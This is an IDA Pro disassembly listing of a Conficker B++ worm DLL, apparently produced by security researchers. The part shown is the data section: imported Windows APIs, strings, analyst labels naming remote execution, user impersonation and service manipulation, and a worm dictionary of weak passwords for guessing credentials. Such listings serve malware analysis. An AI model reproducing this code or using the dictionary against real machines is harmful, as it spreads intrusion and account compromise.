;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 55CE7B3E9A412E546AD7A2D2771ACC88
; File Name : /space/hassen/idata_conficker_bplusplus.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 9A0000
; Section 1. (virtual address 00001000)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 0002036E ( 131950.)
; Offset to raw data for section: 00000200
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: DLL 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 9A1000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 1586h, 1596h, 15AAh, 15BCh, 15D2h, 15E2h, 15F8h, 1610h
dd 162Ah, 164Ah, 165Ah, 166Ah, 1680h, 169Ch, 16B0h, 16C8h
dd 16E0h, 16F8h, 1708h, 171Ah, 172Ah, 173Eh, 174Ch, 175Eh
dd 176Eh, 1780h, 1790h, 17A6h, 17B8h, 17C8h, 17DCh, 17F2h
dd 180Eh, 181Ah, 1824h, 1834h, 1846h, 185Ah, 1868h, 187Ah
dd 0
dd 189Ah, 18A6h, 18C0h, 18CEh, 18DCh, 18ECh, 1902h, 1910h
dd 191Eh, 192Ch, 193Ch, 1950h, 1966h, 1974h, 1982h, 198Eh
dd 199Eh, 19A6h, 19B4h, 19C0h, 19CEh, 19DCh, 19ECh, 19FCh
dd 1A0Ah, 1A18h, 1A2Ah, 1A3Ah, 1A4Eh, 1A64h, 1A7Ah, 1A96h
dd 1AA8h, 1AB4h, 1AC8h, 1AD6h, 1AE8h, 1AF8h, 1B08h, 1B20h
dd 1B30h, 1B48h, 1B60h, 1B7Ch, 1B88h, 1B9Ch, 1BB0h, 1BBEh
dd 1BCEh, 1BDCh, 1BE8h, 1BFAh, 1C10h, 1C24h, 1C36h, 1C4Ch
dd 1C62h, 1C72h, 1C82h, 1C92h, 1CAEh, 1CC2h, 1CD4h, 1CE8h
dd 1CFCh, 1D10h, 1D24h, 1D36h, 1D4Eh, 1D5Eh, 1D72h, 1D82h
dd 1D9Ch, 1DAAh, 1DB8h, 1DC4h, 1DD6h, 1DE2h, 1DF2h, 1E04h
dd 1E14h, 1E22h, 1E32h, 1E48h, 1E5Eh, 1E70h, 1E7Eh, 1E92h
dd 1EA8h, 1EBEh, 1ED6h, 1EE8h, 1F06h, 1F1Eh, 1F36h, 1F42h
dd 1F52h, 0
dd 1F70h, 1F86h, 1F9Ch, 1FB6h, 0
dd 1FDCh, 1FE8h, 1FF8h, 2002h, 200Ch, 2016h, 2020h, 2028h
dd 202Eh, 2034h, 203Eh, 2046h, 2050h, 205Ah, 2064h, 206Eh
dd 2078h, 2082h, 208Ch, 2096h, 20A0h, 20AAh, 20B4h, 20BCh
dd 20C6h, 20D0h, 20DAh, 20E4h, 20F2h, 20FCh, 2106h, 2110h
dd 211Ah, 2124h, 212Eh, 2136h, 213Eh, 214Ah, 2154h, 215Eh
dd 216Ah, 2174h, 2180h, 0
dd 219Ah, 21AEh, 21C2h, 21D8h, 21ECh, 21FAh, 220Ah, 0
dd 222Ah, 223Ah, 2248h, 2258h, 226Ah, 0
dd 2286h, 22A6h, 22C2h, 22D4h, 0
dd 22F2h, 2306h, 0
dd 232Ch, 2338h, 0
dd 2350h, 2364h, 2374h, 2382h, 2390h, 23A2h, 23B6h, 23CAh
dd 23DCh, 23F0h, 23FEh, 0
dd 241Ch, 2432h, 2444h, 0
dd 246Ah, 2480h, 2490h, 24ACh, 24C0h, 24D4h, 0
dd 24F2h, 24FCh, 2504h, 2512h, 251Ch, 252Ah, 2538h, 2540h
dd 254Ah, 2556h, 2566h, 256Eh, 2576h, 2580h, 2592h, 259Ah
dd 25A4h, 25B2h, 25BEh, 25CAh, 25D8h, 25E4h, 25F4h, 2602h
dd 260Ah, 261Ch, 0
dd 2630h, 2648h, 265Ch, 266Eh, 0
dd 268Ch, 0
; char Name[]
Name dd 1000h, 2 dup(0) ; DATA XREF: sub_9A7170+8E�o
dd 1578h, 1000h, 10A4h
; char dword_9A1450[]
dword_9A1450 dd 2 dup(0) ; DATA XREF: sub_9A7170+53�o
dd 188Ch, 10A4h, 122Ch, 2 dup(0)
dd 1F68h, 122Ch, 1240h, 2 dup(0)
dd 1FD0h
; char dword_9A1484[]
dword_9A1484 dd 1240h, 12F0h, 2 dup(0) ; DATA XREF: sub_9A7170+4D�o
dd 218Ch
; char dword_9A1498
dword_9A1498 dd 12F0h, 1310h ; DATA XREF: sub_9A722A+73�o
; char Srch[]
Srch db 8 dup(0) ; DATA XREF: sub_9A7410:loc_9A7487�o
; sub_main+105�o ...
dd 221Ch, 1310h
; char dword_9A14B0[]
dword_9A14B0 dd 1328h, 2 dup(0) ; DATA XREF: sub_9A74E1:loc_9A7506�o
; sub_Impersonate_loggedon_user_for_process+5�o
dd 227Ah
; const WCHAR dword_9A14C0
dword_9A14C0 dd 1328h, 133Ch, 2 dup(0) ; DATA XREF: sub_9A74E1+2�o
dd 22E6h, 133Ch, 1348h, 2 dup(0)
dd 2320h, 1348h, 1354h
; char CommandLine[]
CommandLine dd 2 dup(0) ; DATA XREF: sub_run_dll+132�o
dd 2344h, 1354h, 1384h, 2 dup(0)
dd 2410h, 1384h, 1394h, 2 dup(0)
dd 245Eh
; char aF[]
aF db '' ; DATA XREF: sub_run_dll+47�o
db 13h, 2 dup(0)
dd 13B0h, 0
dword_9A1530 dd 0 ; DATA XREF: sub_call_run_dll+A6�o
dd 24E6h, 13B0h, 141Ch
; char Source[]
Source db 8 dup(0) ; DATA XREF: sub_call_run_dll+9D�o
dd 2626h, 141Ch, 1430h
dword_9A1554 dd 2 dup(0) ; DATA XREF: StartAddress+165�o
; char ServiceName[]
ServiceName dd 2680h, 1430h, 0 ; DATA XREF: StartAddress:loc_9A78E4�o
dword_9A1568 dd 4 dup(0) ; DATA XREF: sub_main:loc_9A7B64�o
dd 61766461h, 32336970h, 6C6C642Eh, 0
aRegopenkeyexw db 'RegOpenKeyExW',0 ; DATA XREF: sub_main:loc_9A7B4F�o
align 4
dd 53676552h, 654B7465h
; char aYsecurity[]
aYsecurity db 'ySecurity',0 ; DATA XREF: sub_main+1A8�o
; sub_9AB59B:loc_9AB59E�o
align 4
dd 6E65704Fh
; char Format[]
Format db 'SCManagerW',0 ; DATA XREF: sub_main+C6�o
aU_0 db 'u',0
align 2
dw 6E45h
; char aUmservicesstat[]
aUmservicesstat db 'umServicesStatusW',0 ; DATA XREF: sub_main+44�o
align 4
dd 6E65704Fh
aServicew db 'ServiceW',0 ; DATA XREF: sub_9A812E+6E�o
align 4
aQueryserviceco db 'QueryServiceConfigW',0
dd 75510000h, 53797265h, 69767265h, 6F436563h, 6769666Eh
dd 5732h, 6D490000h, 73726570h, 74616E6Fh, 676F4C65h, 4F646567h
dd 6573556Eh, 72h, 74696E49h, 696C6169h, 6553657Ah, 69727563h
dd 65447974h, 69726373h, 726F7470h, 6F00h, 4C746547h, 74676E65h
dd 64695368h, 0
aInitializeacl db 'InitializeAcl',0
align 4
aAddaccessallow db 'AddAccessAllowedAce',0
dd 65530000h, 63655374h, 74697275h, 73654479h, 70697263h
dd 44726F74h, 6C6361h, 65530000h, 6C694674h, 63655365h
dd 74697275h, 4179h, 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h
dd 6C615665h, 416575h, 64410000h, 7473756Ah, 656B6F54h
dd 6972506Eh, 656C6976h, 736567h, 68430000h, 65676E61h
dd 76726553h, 43656369h, 69666E6Fh, 4167h, 65520000h, 74726576h
dd 65536F54h, 666Ch, 65520000h, 74655367h, 756C6156h, 41784565h
dd 0
aRegopenkeyexa db 'RegOpenKeyExA',0
align 4
aRegqueryvaluee db 'RegQueryValueExA',0
align 10h
aRegclosekey db 'RegCloseKey',0
dd 72430000h, 65746165h, 76726553h, 41656369h, 0
aStartservicea db 'StartServiceA',0
align 10h
aOpenscmanagera db 'OpenSCManagerA',0
align 10h
dd 704F0000h, 65536E65h, 63697672h, 4165h, 6C430000h, 5365736Fh
dd 69767265h, 61486563h, 656C646Eh, 0
aControlservice db 'ControlService',0
align 4
dd 65440000h, 6574656Ch, 76726553h, 656369h, 704F0000h
dd 72506E65h, 7365636Fh, 6B6F5473h, 6E65h, 65470000h, 6B6F5474h
dd 6E496E65h, 6D726F66h, 6F697461h, 6Eh, 6F6C6C41h, 65746163h
dd 49646E41h, 6974696Eh, 7A696C61h, 64695365h, 0
aEqualsid db 'EqualSid',0
aN db 'N',0
align 4
aFreesid db 'FreeSid',0
dd 65520000h, 756E4567h, 79654B6Dh, 577845h, 65520000h
dd 74655367h, 756C6156h, 57784565h, 6300h, 51676552h, 79726575h
dd 756C6156h, 57784565h, 0
aRegflushkey db 'RegFlushKey',0
dd 65520000h, 65724367h, 4B657461h, 78457965h, 57h, 43676552h
dd 74616572h, 79654B65h, 417845h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 2C50000h, 556C7452h, 6E69776Eh, 3790064h
dd 74696157h, 4D726F46h, 69746C75h, 4F656C70h, 63656A62h
dd 7374h, 724600F1h, 694C6565h, 72617262h, 26C0079h, 6E65704Fh
dd 6E657645h, 4174h, 654701DCh, 72655674h, 6E6F6973h, 417845h
dd 654701B7h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 320041h, 736F6C43h, 6E614865h, 656C64h, 6C4701F2h, 6C61626Fh
dd 65657246h, 1EB0000h, 626F6C47h, 6C416C61h, 636F6Ch
dd 65470169h, 73614C74h, 72724574h, 726Fh, 6547013Ch, 72754374h
dd 746E6572h, 636F7250h, 737365h, 6957037Fh, 68436564h
dd 6F547261h, 746C754Dh, 74794269h, 1DB0065h, 56746547h
dd 69737265h, 6E6Fh, 6F4D025Fh, 69466576h, 7845656Ch, 25E0041h
dd 65766F4Dh, 656C6946h, 1C90041h, 54746547h, 50706D65h
dd 41687461h, 33F0000h, 65656C53h, 820070h, 656C6544h
dd 69466574h, 41656Ch, 6F4C0253h, 69466B63h, 656Ch, 6547015Ch
dd 6C694674h, 7A695365h, 500065h, 61657243h, 69466574h
dd 41656Ch, 7243006Dh, 65746165h, 65726854h, 8006461h
dd 65530301h, 72724574h, 6F4D726Fh, 20006564h, 784500B7h
dd 72507469h, 7365636Fh, 2730073h, 6E65704Fh, 6574754Dh
dd 0CC004178h, 6547010Ah, 6D6F4374h, 646E616Dh, 656E694Ch
dd 5D0041h, 61657243h, 754D6574h, 41786574h, 10E8B00h
dd 43746547h, 75706D6Fh, 4E726574h, 41656D61h, 1747500h
dd 4D746547h, 6C75646Fh, 6C694665h, 6D614E65h, 0C0004165h
dd 6547013Dh, 72754374h, 746E6572h, 636F7250h, 49737365h
dd 8A0064h, 61736944h, 54656C62h, 61657268h, 62694C64h
dd 79726172h, 6C6C6143h, 890073h, 69766544h, 6F496563h
dd 746E6F43h, 6C6F72h, 7257038Ch, 46657469h, 656C69h, 654701C7h
dd 6D655474h, 6C694670h, 6D614E65h, 85004165h, 6956036Eh
dd 61757472h, 6572466Ch, 1980065h, 50746547h, 41636F72h
dd 65726464h, 0C7007373h, 6F4C0242h, 694C6461h, 72617262h
dd 24004179h, 6956036Bh, 61757472h, 6C6C416Ch, 4400636Fh
dd 79530344h, 6D657473h, 656D6954h, 69466F54h, 6954656Ch
dd 0CC00656Dh, 654701BCh, 73795374h, 546D6574h, 656D69h
dd 654C0241h, 43657661h, 69746972h, 536C6163h, 69746365h
dd 0D9006E6Fh, 6E450097h, 43726574h, 69746972h, 536C6163h
dd 69746365h, 1006E6Fh, 6E490216h, 61697469h, 657A696Ch
dd 74697243h, 6C616369h, 74636553h, 6E6F69h, 655202A4h
dd 69466461h, 0C200656Ch, 6F43003Ah, 63656E6Eh, 6D614E74h
dd 69506465h, 4006570h, 7243005Fh, 65746165h, 656D614Eh
dd 70695064h, 6E004165h, 65440083h, 6574656Ch, 656C6946h
dd 16B0057h, 4C746547h, 6C61636Fh, 656D6954h, 536600h
dd 61657243h, 69466574h, 57656Ch, 694600CDh, 6C43646Eh
dd 65736Fh, 694600D4h, 6946646Eh, 46747372h, 57656C69h
dd 2652400h, 746C754Dh, 74794269h, 576F5465h, 43656469h
dd 726168h, 65470111h, 6D6F4374h, 65747570h, 6D614E72h
dd 5765h, 65540348h, 6E696D72h, 54657461h, 61657268h, 13F0064h
dd 43746547h, 65727275h, 6854746Eh, 64616572h, 0FF006449h
dd 6157037Bh, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 2BF0074h, 4C746553h, 45747361h, 726F7272h, 25CF600h
dd 75646F4Dh, 3233656Ch, 7478654Eh, 25AC200h, 75646F4Dh
dd 3233656Ch, 73726946h, 700074h, 61657243h, 6F546574h
dd 65686C6Fh, 3233706Ch, 70616E53h, 746F6873h, 32E6800h
dd 54746553h, 61657268h, 69725064h, 7469726Fh, 3710079h
dd 74726956h, 506C6175h, 65746F72h, 0FF007463h, 654701CEh
dd 72685474h, 50646165h, 726F6972h, 797469h, 6547013Eh
dd 72754374h, 746E6572h, 65726854h, 89006461h, 65470176h
dd 646F4D74h, 48656C75h, 6C646E61h, 0FF004165h, 72430048h
dd 65746165h, 65726944h, 726F7463h, 4004179h, 694600D1h
dd 6946646Eh, 46747372h, 41656C69h, 1DE8900h, 56746547h
dd 6D756C6Fh, 666E4965h, 616D726Fh, 6E6F6974h, 14C0041h
dd 44746547h, 65766972h, 65707954h, 1700041h, 4C746547h
dd 6369676Fh, 72446C61h, 73657669h, 1D28B00h, 54746547h
dd 436B6369h, 746E756Fh, 2928B00h, 72657551h, 72655079h
dd 6D726F66h, 65636E61h, 6E756F43h, 726574h, 6553030Bh
dd 6C694674h, 6D695465h, 15E0065h, 46746547h, 54656C69h
dd 656D69h, 65480203h, 6C417061h, 636F6Ch, 6547019Bh, 6F725074h
dd 73736563h, 70616548h, 2090000h, 70616548h, 65657246h
dd 2874000h, 636F7250h, 33737365h, 78654E32h, 2850074h
dd 636F7250h, 33737365h, 72694632h, 7473h, 6854034Bh, 64616572h
dd 654E3233h, 7478h, 704F0279h, 68546E65h, 64616572h, 34A2E00h
dd 65726854h, 32336461h, 73726946h, 680074h, 61657243h
dd 65526574h, 65746F6Dh, 65726854h, 6461h, 72570395h, 50657469h
dd 65636F72h, 654D7373h, 79726F6Dh, 36C0000h, 74726956h
dd 416C6175h, 636F6C6Ch, 7845h, 704F0275h, 72506E65h, 7365636Fh
dd 2A70073h, 64616552h, 636F7250h, 4D737365h, 726F6D65h
dd 3050079h, 46746553h, 41656C69h, 69727474h, 65747562h
dd 4173h, 65470157h, 6C694674h, 74744165h, 75626972h, 41736574h
dd 13A0000h, 43746547h, 65727275h, 6944746Eh, 74636572h
dd 4179726Fh, 630000h, 61657243h, 72506574h, 7365636Fh
dd 4173h, 6E490219h, 6C726574h, 656B636Fh, 6D6F4364h, 65726170h
dd 68637845h, 65676E61h, 21A0000h, 65746E49h, 636F6C72h
dd 4464656Bh, 65726365h, 746E656Dh, 21E0000h, 65746E49h
dd 636F6C72h, 4964656Bh, 6572636Eh, 746E656Dh, 3020000h
dd 45746553h, 746E6576h, 4C0000h, 61657243h, 76456574h
dd 41746E65h, 21B0000h, 65746E49h, 636F6C72h, 4564656Bh
dd 61686378h, 65676Eh, 2E72706Dh, 6C6C64h, 4E570000h, 64417465h
dd 6E6F4364h, 7463656Eh, 326E6F69h, 57h, 74654E57h, 43646441h
dd 656E6E6Fh, 6F697463h, 41326Eh, 4E570000h, 61437465h
dd 6C65636Eh, 6E6E6F43h, 69746365h, 41326E6Fh, 0
aWnetcancelconn db 'WNetCancelConnection2W',0
align 10h
aMsvcrt_dll db 'msvcrt.dll',0
align 4
dd 695F0000h, 7474696Eh, 6D7265h, 615F0000h, 73756A64h
dd 64665F74h, 7669h, 61630000h, 636F6C6Ch, 0
aSscanf db 'sscanf',0
align 4
dd 656D0000h, 766F6D6Dh, 65h, 61657362h, 686372h, 616C0000h
dd 7362h, 69730000h, 6Eh, 676F6Ch, 74730000h, 6B6F7472h
dd 0
aAtoi db 'atoi',0
align 4
a_wcsdup db '_wcsdup',0
dd 72700000h, 66746E69h, 0
aStrcpy db 'strcpy',0
align 4
dd 74730000h, 706D6372h, 0
aStrcat db 'strcat',0
align 4
dd 63770000h, 72747373h, 0
a_strlwr db '_strlwr',0
dd 74730000h, 72747372h, 0
a_strdup db '_strdup',0
dd 63770000h, 70636E73h, 79h, 6C6C616Dh, 636Fh, 72660000h
dd 6565h, 65720000h, 6F6C6C61h, 63h, 63736377h, 7461h
dd 63770000h, 79706373h, 0
aWcscmp db 'wcscmp',0
align 4
dd 735F0000h, 7270776Eh, 66746E69h, 0
aWcslen db 'wcslen',0
align 4
dd 74730000h, 72686372h, 0
aMemset db 'memset',0
align 10h
dd 656D0000h, 7970636Dh, 0
aMemcmp db 'memcmp',0
align 4
dd 74730000h, 61636E72h, 74h, 6E617273h, 64h, 646E6172h
dd 0
a_snprintf db '_snprintf',0
align 4
aStrncpy db 'strncpy',0
dd 74730000h, 68637272h, 72h, 7274735Fh, 6D63696Eh, 70h
dd 6C727473h, 6E65h, 735F0000h, 63697274h, 706Dh, 6D5F0000h
dd 63696D65h, 706Dh, 6174656Eh, 32336970h, 6C6C642Eh, 0
aNetapibufferfr db 'NetApiBufferFree',0
align 10h
aNetschedulejob db 'NetScheduleJobDel',0
align 4
aNetschedulej_0 db 'NetScheduleJobEnum',0
align 4
dd 654E0000h, 68635374h, 6C756465h, 626F4A65h, 646441h
dd 654E0000h, 65735574h, 756E4572h, 6Dh, 5374654Eh, 65767265h
dd 756E4572h, 6Dh, 5774654Eh, 6174736Bh, 49746547h, 6F666Eh
dd 61656C6Fh, 32337475h, 6C6C642Eh, 4100h, 53737953h, 6E697274h
dd 6E654C67h, 4100h, 69726156h, 49746E61h, 74696Eh, 79530000h
dd 65724673h, 72745365h, 676E69h, 79530000h, 6C6C4173h
dd 7453636Fh, 676E6972h, 6900h, 69726156h, 43746E61h, 7261656Ch
dd 70726900h, 34747263h, 6C6C642Eh, 0
aRpcbindingfrom db 'RpcBindingFromStringBindingA',0
aE db 'e',0
align 4
aRpcstringbindi db 'RpcStringBindingComposeA',0
aI db 'i',0
align 4
aNdrclientcall2 db 'NdrClientCall2',0
aN_0 db 'n',0
align 2
aRpcbindingfree db 'RpcBindingFree',0
aOshell32_dll db 'oshell32.dll',0
align 4
aShgetsetsettin db 'SHGetSetSettings',0
aI_0 db 'I',0
align 4
aShgetspecialfo db 'SHGetSpecialFolderPathA',0
aShlwapi_dll db 'shlwapi.dll',0
dd 74530000h, 72745372h, 4C004149h, 74530000h, 72745372h
dd 5749h, 72657375h, 642E3233h, 65006C6Ch, 65470000h, 73614C74h
dd 706E4974h, 6E497475h, 6F66h, 6F500000h, 654D7473h, 67617373h
dd 6B004165h, 65470000h, 676C4474h, 6D657449h, 6F00h, 64616F4Ch
dd 69727453h, 41676Eh, 65440000h, 6E695766h, 50776F64h
dd 41636F72h, 7300h, 70736944h, 68637461h, 7373654Dh, 41656761h
dd 0
aTranslatemessa db 'TranslateMessage',0
align 4
aRegisterclassa db 'RegisterClassA',0
align 4
dd 6E450000h, 68546D75h, 64616572h, 646E6957h, 73776Fh
dd 65470000h, 73654D74h, 65676173h, 41h, 61657243h, 69576574h
dd 776F646Eh, 417845h, 73726576h, 2E6E6F69h, 6C6C64h, 65470000h
dd 6C694674h, 72655665h, 6E6F6973h, 6F666E49h, 41h, 51726556h
dd 79726575h, 756C6156h, 4165h, 65470000h, 6C694674h, 72655665h
dd 6E6F6973h, 6F666E49h, 657A6953h, 69770041h, 656E696Eh
dd 6C642E74h, 6Ch, 65746E49h, 74656E72h, 736F6C43h, 6E614865h
dd 656C64h, 6E490000h, 6E726574h, 704F7465h, 416E65h, 6E490000h
dd 6E726574h, 65477465h, 6E6F4374h, 7463656Eh, 74536465h
dd 657461h, 6E490000h, 6E726574h, 65527465h, 69466461h
dd 656Ch, 6E490000h, 6E726574h, 704F7465h, 72556E65h, 416Ch
dd 74480000h, 75517074h, 49797265h, 416F666Eh, 73770000h
dd 32335F32h, 6C6C642Eh, 0
aAccept db 'accept',0
align 4
dd 69620000h, 646Eh, 65670000h, 636F7374h, 6D616E6Bh, 65h
dd 646E6573h, 6F74h, 53570000h, 61745341h, 70757472h, 0
aSetsockopt db 'setsockopt',0
align 4
dd 746E0000h, 6C686Fh, 696C0000h, 6E657473h, 0
aShutdown db 'shutdown',0
align 4
aGethostbyname db 'gethostbyname',0
align 4
aNtohl db 'ntohl',0
align 10h
aNtohs db 'ntohs',0
align 4
aConnect db 'connect',0
dd 53570000h, 74654741h, 7473614Ch, 6F727245h, 72h, 646E6573h
dd 0
aSelect db 'select',0
align 4
dd 65670000h, 736F6874h, 6D616E74h, 65h, 74656E69h, 6F746E5Fh
dd 61h, 74656E69h, 6464615Fh, 72h, 736F6C63h, 636F7365h
dd 74656Bh
dword_9A25D8 dd 53570000h, 636F4941h, 6C74h ; DATA XREF: sub_9A7C5E+2�o
; char byte_9A25E4[]
byte_9A25E4 db 2 dup(0) ; DATA XREF: sub_9A7E49+27�o
a__wsafdisset db '__WSAFDIsSet',0
aS_1 db 's',0
align 2
dw 6F69h
aCtlsocket db 'ctlsocket',0 ; DATA XREF: sub_9A7E49+5�o
align 4
; char WindowName[]
WindowName db 'recv',0 ; DATA XREF: sub_9A7F37+1D�o
; sub_run_dll_remote_host+9�r ...
db '\',0
align 4
dd 53415357h, 614C7465h, 72457473h
; char PrefixString[]
PrefixString db 'ror',0 ; DATA XREF: sub_9A7F9D+4B�o
; sub_create_process_for_validated_file+32�o ...
; const CHAR byte_9A261C
byte_9A261C db 0 ; DATA XREF: sub_Call_Set_registry_Values+D�o
; sub_InitializeCriticalSection_decrypt_files+33�o
align 2
aSocket db 'socket',0
aMole32_dll db 'Mole32.dll',0
db 0
align 2
aCoinitializese db 'CoInitializeSecurity',0
aP db 'p',0
align 2
dw 6F43h
dd 61657243h
; char dword_9A2650[]
dword_9A2650 dd 6E496574h ; DATA XREF: sub_Call_Set_registry_Values+8�o
; sub_InitializeCriticalSection_decrypt_files+2E�o
; char aStance[]
aStance db 'stance',0 ; DATA XREF: sub_9A84E1+F�o
; sub_9A8579+70�o
aE_0 db 'E',0
align 2
aCouninitialize db 'CoUninitialize',0
aS_2 db 's',0
align 10h
aCoinitializeex db 'CoInitializeEx',0
aPurlmon_dll db 'purlmon.dll',0 ; DATA XREF: sub_9A84E1+A�o
; sub_9A8579+6B�o
align 4
; char byte_9A268C[]
byte_9A268C db 2 dup(0) ; DATA XREF: sub_create_name_forpipe+2A�o
aObtainuseragen db 'ObtainUserAgentString',0
dword_9A26A4 dd 70747468h ; DATA XREF: sub_Build_Ipv4DottedAddress_from_url_string+72�r
; sub_check_string_format_is_http_url+5�r
dword_9A26A8 dd 2F2F3Ah ; DATA XREF: sub_Build_Ipv4DottedAddress_from_url_string+7A�r
; sub_check_string_format_is_http_url+D�r
align 10h
stru_9A26B0 _msEH <0FFFFFFFFh, offset loc_9A90DE, offset loc_9A90E2>
; DATA XREF: sub_9A9067+5�o
; char aSoftwareMicros[]
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Applets',0
; DATA XREF: sub_9A91B5+C�o
; sub_9A91E7+19�o
; char word_9A26EE[]
word_9A26EE dw 0 ; DATA XREF: sub_9A91B5+6�o
; sub_9A91E7+13�o
dword_9A26F0 dd 706967h, 2 dup(39393939h), 0 ; DATA XREF: .text:009BA3F0�o
a9999999 db '9999999',0 ; DATA XREF: .text:009BA3EC�o
a999999 db '999999',0 ; DATA XREF: .text:009BA3E8�o
align 10h
a99999 db '99999',0 ; DATA XREF: .text:009BA3E4�o
align 4
a9999 db '9999',0 ; DATA XREF: .text:009BA3E0�o
align 10h
a999 db '999',0 ; DATA XREF: .text:009BA3DC�o
a99 db '99',0 ; DATA XREF: .text:009BA3D8�o
align 4
a9: ; DATA XREF: .text:009BA3D4�o
unicode 0, <9>,0
a88888888 db '88888888',0 ; DATA XREF: .text:009BA3D0�o
align 4
a8888888 db '8888888',0 ; DATA XREF: .text:009BA3CC�o
a888888 db '888888',0 ; DATA XREF: .text:009BA3C8�o
align 4
a88888 db '88888',0 ; DATA XREF: .text:009BA3C4�o
align 10h
a8888 db '8888',0 ; DATA XREF: .text:009BA3C0�o
align 4
a888 db '888',0 ; DATA XREF: .text:009BA3BC�o
a88 db '88',0 ; DATA XREF: .text:009BA3B8�o
align 10h
a8: ; DATA XREF: .text:009BA3B4�o
unicode 0, <8>,0
a77777777 db '77777777',0 ; DATA XREF: .text:009BA3B0�o
align 10h
a7777777 db '7777777',0 ; DATA XREF: .text:009BA3AC�o
a777777 db '777777',0 ; DATA XREF: .text:009BA3A8�o
align 10h
a77777 db '77777',0 ; DATA XREF: .text:009BA3A4�o
align 4
a7777 db '7777',0 ; DATA XREF: .text:009BA3A0�o
align 10h
a777 db '777',0 ; DATA XREF: .text:009BA39C�o
a77 db '77',0 ; DATA XREF: .text:009BA398�o
align 4
a7: ; DATA XREF: .text:009BA394�o
unicode 0, <7>,0
a66666666 db '66666666',0 ; DATA XREF: .text:009BA390�o
align 4
a6666666 db '6666666',0 ; DATA XREF: .text:009BA38C�o
a666666 db '666666',0 ; DATA XREF: .text:009BA388�o
align 4
a66666 db '66666',0 ; DATA XREF: .text:009BA384�o
align 10h
a6666 db '6666',0 ; DATA XREF: .text:009BA380�o
align 4
a666 db '666',0 ; DATA XREF: .text:009BA37C�o
a66 db '66',0 ; DATA XREF: .text:009BA378�o
align 10h
a6: ; DATA XREF: .text:009BA374�o
unicode 0, <6>,0
a55555555 db '55555555',0 ; DATA XREF: .text:009BA370�o
align 10h
a5555555 db '5555555',0 ; DATA XREF: .text:009BA36C�o
a555555 db '555555',0 ; DATA XREF: .text:009BA368�o
align 10h
a55555 db '55555',0 ; DATA XREF: .text:009BA364�o
align 4
a5555 db '5555',0 ; DATA XREF: .text:009BA360�o
align 10h
a555 db '555',0 ; DATA XREF: .text:009BA35C�o
a55 db '55',0 ; DATA XREF: .text:009BA358�o
align 4
a5: ; DATA XREF: .text:009BA354�o
unicode 0, <5>,0
a44444444 db '44444444',0 ; DATA XREF: .text:009BA350�o
align 4
a4444444 db '4444444',0 ; DATA XREF: .text:009BA34C�o
a444444 db '444444',0 ; DATA XREF: .text:009BA348�o
align 4
a44444 db '44444',0 ; DATA XREF: .text:009BA344�o
align 10h
a4444 db '4444',0 ; DATA XREF: .text:009BA340�o
align 4
a444 db '444',0 ; DATA XREF: .text:009BA33C�o
a44 db '44',0 ; DATA XREF: .text:009BA338�o
align 10h
a4: ; DATA XREF: .text:009BA334�o
unicode 0, <4>,0
a33333333 db '33333333',0 ; DATA XREF: .text:009BA330�o
align 10h
a3333333 db '3333333',0 ; DATA XREF: .text:009BA32C�o
a333333 db '333333',0 ; DATA XREF: .text:009BA328�o
align 10h
a33333 db '33333',0 ; DATA XREF: .text:009BA324�o
align 4
a3333 db '3333',0 ; DATA XREF: .text:009BA320�o
align 10h
a333 db '333',0 ; DATA XREF: .text:009BA31C�o
a33 db '33',0 ; DATA XREF: .text:009BA318�o
align 4
a3: ; DATA XREF: .text:009BA314�o
unicode 0, <3>,0
a22222222 db '22222222',0 ; DATA XREF: .text:009BA310�o
align 4
a2222222 db '2222222',0 ; DATA XREF: .text:009BA30C�o
a222222 db '222222',0 ; DATA XREF: .text:009BA308�o
align 4
a22222 db '22222',0 ; DATA XREF: .text:009BA304�o
align 10h
a2222 db '2222',0 ; DATA XREF: .text:009BA300�o
align 4
a222 db '222',0 ; DATA XREF: .text:009BA2FC�o
a22 db '22',0 ; DATA XREF: .text:009BA2F8�o
align 10h
a2: ; DATA XREF: .text:009BA2F4�o
unicode 0, <2>,0
a11111111 db '11111111',0 ; DATA XREF: .text:009BA2F0�o
align 10h
a1111111 db '1111111',0 ; DATA XREF: .text:009BA2EC�o
a111111 db '111111',0 ; DATA XREF: .text:009BA2E8�o
align 10h
a11111 db '11111',0 ; DATA XREF: .text:009BA2E4�o
align 4
a1111 db '1111',0 ; DATA XREF: .text:009BA2E0�o
align 10h
a111 db '111',0 ; DATA XREF: .text:009BA2DC�o
a11 db '11',0 ; DATA XREF: .text:009BA2D8�o
align 4
a1: ; DATA XREF: sub_9B6663+8F�o
; .text:009BA2D4�o
unicode 0, <1>,0
a00000000 db '00000000',0 ; DATA XREF: .text:009BA2D0�o
align 4
a0000000 db '0000000',0 ; DATA XREF: .text:009BA2CC�o
a00000 db '00000',0 ; DATA XREF: .text:009BA2C4�o
; .text:009BA2C8�o
align 4
a0000 db '0000',0 ; DATA XREF: .text:009BA2C0�o
align 10h
a000 db '000',0 ; DATA XREF: .text:009BA2BC�o
a00 db '00',0 ; DATA XREF: .text:009BA2B8�o
align 4
a0987654321 db '0987654321',0 ; DATA XREF: .text:009BA2B0�o
align 4
a987654321 db '987654321',0 ; DATA XREF: .text:009BA2AC�o
align 10h
a87654321 db '87654321',0 ; DATA XREF: .text:009BA2A8�o
align 4
a7654321 db '7654321',0 ; DATA XREF: .text:009BA2A4�o
